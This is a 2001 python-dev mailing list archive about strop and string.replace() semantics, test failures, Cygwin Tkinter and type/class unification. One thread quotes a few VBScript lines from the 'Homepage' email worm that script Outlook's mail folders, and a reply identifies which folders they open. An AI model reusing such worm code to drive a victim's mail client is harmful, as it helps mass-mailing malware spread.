string.replace() behavior In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400." References: Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> > test_strop.py contains this line: > > test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0) > > string_tests.py has this: > > test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) > > IOW, the test suite insists that > > strop.replace('one!two!three!', '!', '@', 0) > > replace all matches but that > > string.replace('one!two!three!', '!', '@', 0) > and > 'one!two!three!'.replace('!', '@', 0) > > replace nothing. > > I've been thrashing like a madman trying to fix a common bug in both modules > (in out-of-synch copies of mymemreplace), and every time I think I fix > something "the other" module breaks. The above appears to be why. > > My opinion: the test_strop.py test is in error, and so was strop_replace() > in stropmodule.c. I'm checking in changes accordingly, but won't mind > getting yelled at if you disagree. HMMMMMM! In Python 1.5, a count of zero always replaces all occurrences, both using string and using strop. In 2.0 and later, strop's replace(..., 0) still replaces all, but string's replaces none. The replace() method of strings and unicode objects agrees with string.py. I think this change was made in the sake of ease of documenting the behavior: special-casing the count of zero is unexpected. I very vaguely recall that it was discussed on this list. So this suggests that test_string is correct, and string.replace() (and the methods) shouldn't be "fixed"! But since we're not really supporting strop any more, I think that strop shouldn't be changed either. So we'll have to live with the difference -- sorry! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:13:20 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:13:20 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) So if Fred changes the docs to say it's obsolete, maybe we can actually rip out the buggy and redundant code it contains in about 2 years . cheeredly y'rs - tim From guido at digicool.com Thu May 10 04:25:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:25:43 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400." <20010509210858.A3467@gerg.ca> References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> <20010509210858.A3467@gerg.ca> Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com> > Perhaps 2.2 should deprecate direct use of strop noisily -- warn when > imported, except when imported by string.py. (No idea how you'd > implement that, I'm just spouting off.) Then it could go away in 2.3. I have had the necessary mods sitting in my directory for months (it was one of my first tests for using the warnings module), but decided against checking it in because I found there's quite a bit of code that triggered the warnings. Maybe I should check it in into 2.2a0, so developers can get used to it. > I don't think there's anything particularly controversial about 'strop' > going away after one release with a deprecation warning -- it's not > 'string', after all! (Ie. imported by every single scrap of Python code > ever written before string methods came along, and by quite a lot since > then.) Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 04:27:23 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:27:23 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400." References: Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> > [Guido] > > In my mind, strop is obsolete. We keep it around because some losers > > like to import it directly, but it's basically dead, and except for a > > few functions, string.py doesn't use it any more. (The exceptions are > > maketrans, lowercase, uppercase, whitespace.) > > So if Fred changes the docs to say it's obsolete, maybe we can actually rip > out the buggy and redundant code it contains in about 2 years . Yes, but in the mean time the fact that it's buggy doesn't bother me at all. Let it be as buggy as it always was -- that's one more reason to stop using it! :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:33:52 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:33:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > HMMMMMM! In Python 1.5, a count of zero always replaces all > occurrences, both using string and using strop. In 2.0 and later, > strop's replace(..., 0) still replaces all, but string's replaces > none. The replace() method of strings and unicode objects agrees with > string.py. > > I think this change was made in the sake of ease of documenting the > behavior: special-casing the count of zero is unexpected. Yes, -1 == infinity is much clearer . > I very vaguely recall that it was discussed on this list. > > So this suggests that test_string is correct, and string.replace() > (and the methods) shouldn't be "fixed"! I didn't change their behavior wrt replace()'s interpretation of count, but to repair an unrelated bug (bogus MemoryError for an empty-string *result*) that happened to appear in both copies of mymemreplace sitting in the code base (one in stringobject.c, another but out-of-synch one in stropmodule.c). That's how stropmodule got sucked into this: to fix the gross null-string result bug common to both. > But since we're not really supporting strop any more, I think that > strop shouldn't be changed either. So we'll have to live with the > difference -- sorry! OK, I've restored the 0 == infinity semantics to strop.replace() and test_strop.py, but have not backed out the null-string result fix, nor the pain to make the mymemreplace clones identical again. From tim.one at home.com Thu May 10 04:00:30 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 22:00:30 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Yes, but in the mean time the fact that it's buggy doesn't bother me > at all. Let it be as buggy as it always was -- that's one more reason > to stop using it! :-) I think that's unsustainable in this specific case: stringobject and stropmodule contained several utility functions with the same names that clearly started life as identical code. Over time they got out of synch, and when they punched me in the face today, I had no idea which was "right" and which "wrong". Turned out they both had the same bug, and the clearest way to fix it in stringobject.c without leaving a more inconsistent x-module mess was to bring the once-common utility routines back into synch. As /F said, though, the mymemreplace() approach is inefficient and "should be" replaced wholesale. If that's done in stringobject.c alone, great, then I won't care about the legacy routines in stropmodule.c either. What I can't abide is having one copy of a function in the codebase work and a clone of it not work -- unless you can keep the undocumented history of both in your mind at all times, you're just as likely to bump into the broken one first when searching the code base, and if you're unlucky never even realize it is "the broken one" (or, if you're lucky, bump into the good one too, and then pee away time trying to understand the differences). i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't- eat-it-by-mistake-ly y'rs - tim From Jason.Tishler at dothill.com Thu May 10 04:06:15 2001 From: Jason.Tishler at dothill.com (Jason Tishler) Date: Wed, 9 May 2001 22:06:15 -0400 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500 References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com> Message-ID: <20010509220615.A1928@dothill.com> Mike, On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote: > > I am playing around with CygWin (which came with Pyhton 2.1 > > installed). While I can run command line programs, Tkinter is not > > part of the package. TCL/TK is installed and I have been able to > > build TK GUI's. How can I get Tkinter added to my Python package? > > Thanks. > > Beats me. Ask whoever produces the CygWin port. I am the Cygwin Python maintainer. Please see the following for my views on adding Tkinter support to Cygwin Python: http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html If Tkinter support is important to you, then please submit the appropriate patches for consideration to the Python Patch Manager on SourceForge. Norman Vine has built a Cygwin Python that supports Tkinter. See the following for his build procedure: http://www.vso.cape.com/~nhv/files/python/ Perhaps you would like to collaborate with Norman on this effort? Thanks, Jason -- Jason Tishler Director, Software Engineering Phone: +1 (732) 264-8770 x235 Dot Hill Systems Corp. Fax: +1 (732) 264-8798 82 Bethany Road, Suite 7 Email: Jason.Tishler at dothill.com Hazlet, NJ 07730 USA WWW: http://www.dothill.com From tim.one at home.com Thu May 10 04:54:45 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 22:54:45 -0400 Subject: [Python-Dev] test_mmap failing? Message-ID: I checked in a change to mmapmodule.c earlier today, to close a patch complaining about unused vrbl warnings. Here's the changed routine before ("value" is unused): mmap_read_byte_method(mmap_object *self, PyObject *args) { char value; char *where; CHECK_VALID(NULL); if (!PyArg_ParseTuple(args, ":read_byte")) return NULL; if (self->pos < self->size) { where = self->data + self->pos; value = (char) *(where); self->pos += 1; return Py_BuildValue("c", (char) *(where)); } else { PyErr_SetString (PyExc_ValueError, "read byte out of range"); return NULL; } } and after: mmap_read_byte_method(mmap_object *self, PyObject *args) { CHECK_VALID(NULL); if (!PyArg_ParseTuple(args, ":read_byte")) return NULL; if (self->pos < self->size) { char value = self->data[self->pos]; self->pos += 1; return Py_BuildValue("c", value); } else { PyErr_SetString (PyExc_ValueError, "read byte out of range"); return NULL; } } I'll be damned if I can see any semantic difference, and test_mmap worked fine on Windows after the change. But Fred reported: """ the fix introduced breakage on Linux (kernel 2.2.17): cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap test_mmap test_mmap test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument Traceback (most recent call last): File "../Lib/test/regrtest.py", line 246, in runtest __import__(test, globals(), locals(), []) File "../Lib/test/test_mmap.py", line 124, in ? test_both() File "../Lib/test/test_mmap.py", line 14, in test_both f.write('\0'* PAGESIZE) IOError: [Errno 22] Invalid argument 1 test failed: test_mmap """ However, at the point that's failing, test_mmap hasn't even *created* an mmap'ed file yet, let alone tried to read from it. The only thing test_mmap did so far is (the first comment is bogus -- that's the builtin Python open() function): # Create an mmap'ed file # THIS IS A BOGUS COMMENT f = open('foo', 'w+') # Write 2 pages worth of data to the file f.write('\0'* PAGESIZE) # THIS IS THE LINE IT'S DYING ON But having suffered too many "impossible problems" the last 36 hours, my confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under current CVS? Fred, are you *sure* it fails for you -- if so, does the problem actually go away if you revert mmapmodule.c? looking-for-sense-in-all-the-wrong-places-ly y'rs - tim From jeremy at digicool.com Thu May 10 05:17:34 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 9 May 2001 23:17:34 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: References: Message-ID: <15098.2126.368714.159135@slothrop.digicool.com> The latest CVS build works on my Linux 2.2.12 system. No problem with test_mmap. But test_pty does fail with some complaints about FCNTL, which Fred just removed. Maybe Fred is working in an alternate universe where test_mmap and test_pty are swapped. Jeremy From barry at digicool.com Thu May 10 06:08:42 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 00:08:42 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <15098.5194.677531.35326@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Oh, fuck. Somebody remind me why we have both stropmodule.c TP> and stringobject.c? These bugs exist in both. IIRC, I once proposed to share code bases through elaborate #includes and exported functions, but that never went very far. Guido's already pronounced on this, and I'd say good riddance to strop. >>>>> "GvR" == Guido van Rossum writes: GvR> Yes, but in the mean time the fact that it's buggy doesn't GvR> bother me at all. Let it be as buggy as it always was -- GvR> that's one more reason to stop using it! :-) -----------------------------------^^^^ For a minute there, I thought you said "to strop using it". :) -Barry From fredrik at pythonware.com Thu May 10 08:22:53 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Thu, 10 May 2001 08:22:53 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid> Tim Peters wrote: > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names that > clearly started life as identical code. Over time they got out of synch, and > when they punched me in the face today, I had no idea which was "right" and > which "wrong". Turned out they both had the same bug, and the clearest way > to fix it in stringobject.c without leaving a more inconsistent x-module mess > was to bring the once-common utility routines back into synch. > > As /F said, though, the mymemreplace() approach is inefficient and "should > be" replaced wholesale. If that's done in stringobject.c alone, great, then > I won't care about the legacy routines in stropmodule.c either. as a footnote, SRE uses the same source code to generate both 8-bit and 16-bit versions of the match engine. I see no reason why we cannot do the same for the string operations (PyString, PyUnicode, and strop). if anyone wants me to look into this, just say "go ahead". > > no wonder u"".replace() is 30% faster than "".replace() ;-) > > For a given number of characters or bytes ? characters. judging from the SRE benchmarks, modern platforms can process 16-bit characters as fast as they can process 8-bit characters. Cheers /F From thomas at xs4all.net Thu May 10 11:31:38 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 10 May 2001 11:31:38 +0200 Subject: [Python-Dev] Homepage In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200 References: <200105091712.TAA05172@core.inf.ethz.ch> Message-ID: <20010510113138.K16486@xs4all.nl> On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote: > Set s=CreateObject("Outlook.Application") > Set t=s.GetNameSpace("MAPI") > Set u=t.GetDefaultFolder(6) [..] > Set u=t.GetDefaultFolder(3) I know it's off-topic, but Greg started it! ;-) Does anyone know which folders those two 'GetDefaultFolder' statements open ? I suspect it's sent-mail and trash, or some such, but I don't know enough about Outlook to know if it even *has* sent-mail and trash folders :) Thanx for sending it through, Samuele, it was fun reading, and useful to our helpdesk (especially the fact that it only sends out mails once, even though it starts the porn page every time, and that it doesn't do anything harmful at all.) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From MarkH at ActiveState.com Thu May 10 12:36:13 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Thu, 10 May 2001 20:36:13 +1000 Subject: [Python-Dev] Homepage In-Reply-To: <20010510113138.K16486@xs4all.nl> Message-ID: > > Set u=t.GetDefaultFolder(6) > > Set u=t.GetDefaultFolder(3) > I know it's off-topic, but Greg started it! ;-) Does anyone know which > folders those two 'GetDefaultFolder' statements open ? I suspect it's > sent-mail and trash, or some such, but I don't know enough about > Outlook to > know if it even *has* sent-mail and trash folders :) Running makepy.py over the Outlook type library yields the following: olFolderCalendar =0x9 # from enum OlDefaultFolders olFolderContacts =0xa # from enum OlDefaultFolders olFolderDeletedItems =0x3 # from enum OlDefaultFolders olFolderDrafts =0x10 # from enum OlDefaultFolders olFolderInbox =0x6 # from enum OlDefaultFolders olFolderJournal =0xb # from enum OlDefaultFolders olFolderNotes =0xc # from enum OlDefaultFolders olFolderOutbox =0x4 # from enum OlDefaultFolders olFolderSentMail =0x5 # from enum OlDefaultFolders olFolderTasks =0xd # from enum OlDefaultFolders So it appears the inbox and deleted items. Mark. From tim.one at home.com Thu May 10 10:54:42 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 10 May 2001 04:54:42 -0400 Subject: [Python-Dev] test___all__ failing on WIndows Message-ID: > python ../lib/test/regrtest.py test___all__ test___all__ test test___all__ failed -- tty has no __all__ attribute 1 test failed: test___all__ C:\Code\python\dist\src\PCbuild> I assume this is yet another case where some excruciatingly non-obvious sequence of failing imports manages to leave behind a damaged module object in sys.modules that prevents test___all__'s import of tty from getting the ImportError it *ought* to get under Windows (and betting termios is the ultimate culprit). I've fixed enough of these. Somebody who thinks this is "a feature" gets to do it this time . From guido at digicool.com Thu May 10 15:43:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 08:43:07 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400." References: Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com> > [Guido] > > Yes, but in the mean time the fact that it's buggy doesn't bother > > me at all. Let it be as buggy as it always was -- that's one more > > reason to stop using it! :-) [Tim] > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names > that clearly started life as identical code. Over time they got out > of synch, and when they punched me in the face today, I had no idea > which was "right" and which "wrong". Turned out they both had the > same bug, and the clearest way to fix it in stringobject.c without > leaving a more inconsistent x-module mess was to bring the > once-common utility routines back into synch. Of course, the real bug was copy-and-paste programming. The common code should have been factored out rather than copied. > As /F said, though, the mymemreplace() approach is inefficient and > "should be" replaced wholesale. If that's done in stringobject.c > alone, great, then I won't care about the legacy routines in > stropmodule.c either. What I can't abide is having one copy of a > function in the codebase work and a clone of it not work -- unless > you can keep the undocumented history of both in your mind at all > times, you're just as likely to bump into the broken one first when > searching the code base, and if you're unlucky never even realize it > is "the broken one" (or, if you're lucky, bump into the good one > too, and then pee away time trying to understand the differences). Here's an idea. We remove stropmodule.c, and replace it with a strop.py that issues a warning and then imports selected things from string.py. The only complication is that there are a few constants and one function in strop that are still imported into string.py; I propose to move these to an "internal" extension module (e.g. "_string"). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 16:02:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 09:02:59 -0500 Subject: [Python-Dev] test_mmap failing? In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400." <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com> > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Strange. The *both* work for me with the latest CVS (and even after removing all *.pyc files!), although last night (?) I recall seeing a test_pty faulure too. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Thu May 10 16:16:24 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 10 May 2001 09:16:24 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> References: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: <15098.41656.128146.826459@beluga.mojam.com> Guido> Yes, but in the mean time the fact that it's buggy doesn't bother Guido> me at all. Let it be as buggy as it always was -- that's one Guido> more reason to stop using it! :-) In fact, perhaps the import warning could mention that strop is buggy and won't be fixed... :-) Skip From skip at pobox.com Thu May 10 16:32:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 10 May 2001 09:32:15 -0500 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: References: Message-ID: <15098.42607.84670.323361@beluga.mojam.com> >> python ../lib/test/regrtest.py test___all__ Tim> test___all__ Tim> test test___all__ failed -- tty has no __all__ attribute Tim> 1 test failed: test___all__ grumble, grumble... Tim> I assume this is yet another case where some excruciatingly Tim> non-obvious sequence of failing imports manages to leave behind a Tim> damaged module object in sys.modules that prevents test___all__'s Tim> import of tty from getting the ImportError it *ought* to get under Tim> Windows (and betting termios is the ultimate culprit). I (thankfully) gave up even pretending to run Windows recently, so I can only make a suggestion for others who look into this problem. Try this: Change test___all__.check_all so that the except clause reads: except ImportError, msg: then print out msg when an import fails. You should get the actual module that failed to import. If foo.py consists of simply "import bar", and I import it, I see that bar couldn't be imported: >>> try: ... import foo ... except ImportError, msg: ... print msg ... No module named bar Skip From fdrake at acm.org Thu May 10 16:57:59 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:57:59 -0400 (EDT) Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: References: Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Tim Peters writes: > But having suffered too many "impossible problems" the last 36 hours, my > confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under > current CVS? Fred, are you *sure* it fails for you -- if so, does the > problem actually go away if you revert mmapmodule.c? It was indeed showing the behavior I described! I figured out what it was this morning and closed the patch again. The problem, of course(!), had nothing to do with mmap, before or after any of the recent changes to mmap. Or any old changes. It had a lot to do with the change I made to the socket module. ;-) While figuring out the reported bug in the socket module, I created named pipes, including one named "foo". The mmap test opens a file "foo" with mode "w+" in the directory in which I just happened to create the named pipe, so it ended up with a file object opened on a pipe -- things just don't work the same for these beasts! Needless to say test_mmap failed with a cryptic error message. This begs the question, though -- should tests that create temp files check that the files don't already exist, and fail with a more descriptive error if they do? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Thu May 10 16:59:08 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:59:08 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com> Jeremy Hylton writes: > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Or, I could just be working in an alternate universe altogether. I've been known to do that.... -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From paulp at ActiveState.com Thu May 10 23:55:36 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 14:55:36 -0700 Subject: [Python-Dev] Type/class Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com> -------- Original Message -------- Log Message: Make attributes of subtypes writable, but only for dynamic subtypes derived in Python using a class statement; static subtypes derived in C still have read-only attributes. -------- Original Message -------- I would like to argue that "plain old C types" should act as if they have __dict__s for consistency with other types. It is sometimes useful to be able to annotate objects by adding attributes to them. But this only works with class instance objects, not instances of types. Paul Prescod From jeremy at digicool.com Thu May 10 23:59:34 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 10 May 2001 17:59:34 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <15099.3910.648127.25900@slothrop.digicool.com> >>>>> "PP" == Paul Prescod writes: PP> I would like to argue that "plain old C types" should act as if PP> they have __dict__s for consistency with other types. It is PP> sometimes useful to be able to annotate objects by adding PP> attributes to them. But this only works with class instance PP> objects, not instances of types. Every type should have an __dict__ of type dict? Then every dict must have an __dict__, including the __dict__ of __dict__? Once every object has an __dict__, every object will be mutable. Then no object will be usable as a dict key and we can get rid of dict's entirely. Jeremy From fdrake at cj42289-a.reston1.va.home.com Fri May 11 00:47:14 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 18:47:14 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update for the maintenance version docs. From fdrake at cj42289-a.reston1.va.home.com Fri May 11 01:04:40 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 19:04:40 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for the development version of the docs. From guido at digicool.com Fri May 11 02:03:13 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 19:03:13 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST." <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Glad somebody is watching what I'm doing here -- I was afraid I was having too much fun by myself! :-) > -------- Original Message -------- > Log Message: > > Make attributes of subtypes writable, but only for dynamic subtypes > derived in Python using a class statement; static subtypes derived in > C still have read-only attributes. > -------- Original Message -------- > > I would like to argue that "plain old C types" should act as if they > have __dict__s for consistency with other types. Good point. Plain old types currently (in the descr-branch) have a readonly dict (using a proxy) and no settable attributes. I will probably give types settable attributes in a next revision, but I prefer not to make the type's dict writable -- I need to be able to watch the setattr calls so that if someone changes DictType.__getitem__ I can change the mp_subscript to a C function that calls the __getitem__ method. For speed reasons, if you don't override them, the C tp_slot functions carry out the operation directly, and the __slot__ methods call the C tp_slot functions; but when __slot__ is overridden, tp_slot must call __slot__. > It is sometimes useful > to be able to annotate objects by adding attributes to them. But this > only works with class instance objects, not instances of types. > > Paul Prescod If you're talking about *instances*: instances of subtypes of built-in types have a dict of their own to which you can add stuff to your heart's content. Instances of built-in types will continue not to have a dict (it would cost too much space if *every* object had a dict, even if it was a NULL pointer when no attrs are defined). If you mean you want to annotate types like you can annotate classes, that should be possible once I implement what I describe above. --Guido van Rossum (home page: http://www.python.org/~guido/) From paulp at ActiveState.com Fri May 11 01:22:16 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 16:22:16 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com> Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com> Jeremy Hylton wrote: > > >>>>> "PP" == Paul Prescod writes: > > PP> I would like to argue that "plain old C types" should act as if > PP> they have __dict__s for consistency with other types. It is > PP> sometimes useful to be able to annotate objects by adding > PP> attributes to them. But this only works with class instance > PP> objects, not instances of types. > > Every type should have an __dict__ of type dict? Then every dict > must have an __dict__, including the __dict__ of __dict__? What's wrong with that? Every object has a type, even type objects, and type types. It only becomes a problem if you try to recursively walk all the dictionaries in the system adding information to them. Otherwise they have null pointers that "act as if" they were empty dictionaries. > Once every object has an __dict__, every object will be mutable. Then > no object will be usable as a dict key and we can get rid of dict's > entirely. According to that argument, instances cannot be dictionary keys. That is simply not true. Objects do not implement their hash functions in terms of ALL of their attributes! -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mwh at python.net Fri May 11 01:31:53 2001 From: mwh at python.net (Michael Hudson) Date: Fri, 11 May 2001 00:31:53 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10 Message-ID: This is a summary of traffic on the python-dev mailing list between Apr 26 and May 9 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the seventh summary written by Michael Hudson. Summaries are archived at: Posting distribution (with apologies to mbm) Number of articles in summary: 228 40 | [|] | [|] | [|] | [|] [|] | [|] [|] 30 | [|] [|] | [|] [|] | [|] [|] | [|] [|] | [|] [|] 20 | [|] [|] [|] [|] | [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] 10 | [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039 Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08| Fri 27 Sun 29 Tue 01 Thu 03 Sat 05 Mon 07 Wed 09 A fairly quiet, but interesting fortnight (and I don't mean the sarcastic replies to the Homepage virus). A few build problems and bugs fixed, and one very involved discussion (cf. most of the rest of this summary). * type == class? * Guido posted a message from Jim Althoff describing the metaclass system used in Smalltalk: He also mentioned a problem that is bound to bite any attempt to heal the type/class split in Python. If there are to be no special cases in the type system then classes and types in particular should be instances. This sounds innocuous, but consider: class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) The code is hoping that, as in today's Python, DictType.__repr__ will return an unbound method - the __repr__ method of vanilla dictionaries, so that output of the form MyDictType({1:2}) will be given. But DictType is now an instance, so there's another interpretation for DictType.__repr__ - the bound DictType's own __repr__ method! This is a fundamental problem; currently "class.attr" and "instance.attr" have different meanings in Python, and any attempt to conflate the notions of "class" and "instance" is bound to run aground. Guido proposed some hairy disambiguation rules in the above-linked message, but no-one was particularly enthused about them, possibly because no-one could really get their head round them. The long term solution is to change the syntax for getting - or removing entirely - unbound methods. As far as anyone can make out, all that unbound methods are used for is called superclasses' methods from overriding methods, so if one can find another way of spelling that, then removing unbound methods entirely could be contemplated. So the discussion on that went around for a bit, with no really new compelling ideas surfacing. There was some support for some kind of souped up super.foo() construct: To me, the most plausible ideas came from Thomas Heller: and from Paul Dubois, who suggested nicking the feature renaming feature from Eiffel: though the best syntax for the latter is far from clear. There's also the king-sized issue of backwards compatibility; to a first degree of approximation, *all* Python code that uses inheritance would need to be updated to accommodate changes in the meaning of "class.attribute". Another __future__ statement, maybe? * data.decode * Marc-Andre Lemburg asked if it might be an idea if string objects sprouted an .decode method: After some umming and arring and accusations of bloat, this got BDFL approval, and should appear in CVS imminently. * Moving MacPython to sourceforge * Jack Jansen posted notice that he intends to move the MacPython code over to sourceforge: It will be nice to finally have all the code in the same place! Cheers, M. From paulp at ActiveState.com Fri May 11 02:26:43 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 17:26:43 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Message-ID: <3AFB31C3.5CEF9064@ActiveState.com> Guido van Rossum wrote: > >... > > Good point. Plain old types currently (in the descr-branch) have a > readonly dict (using a 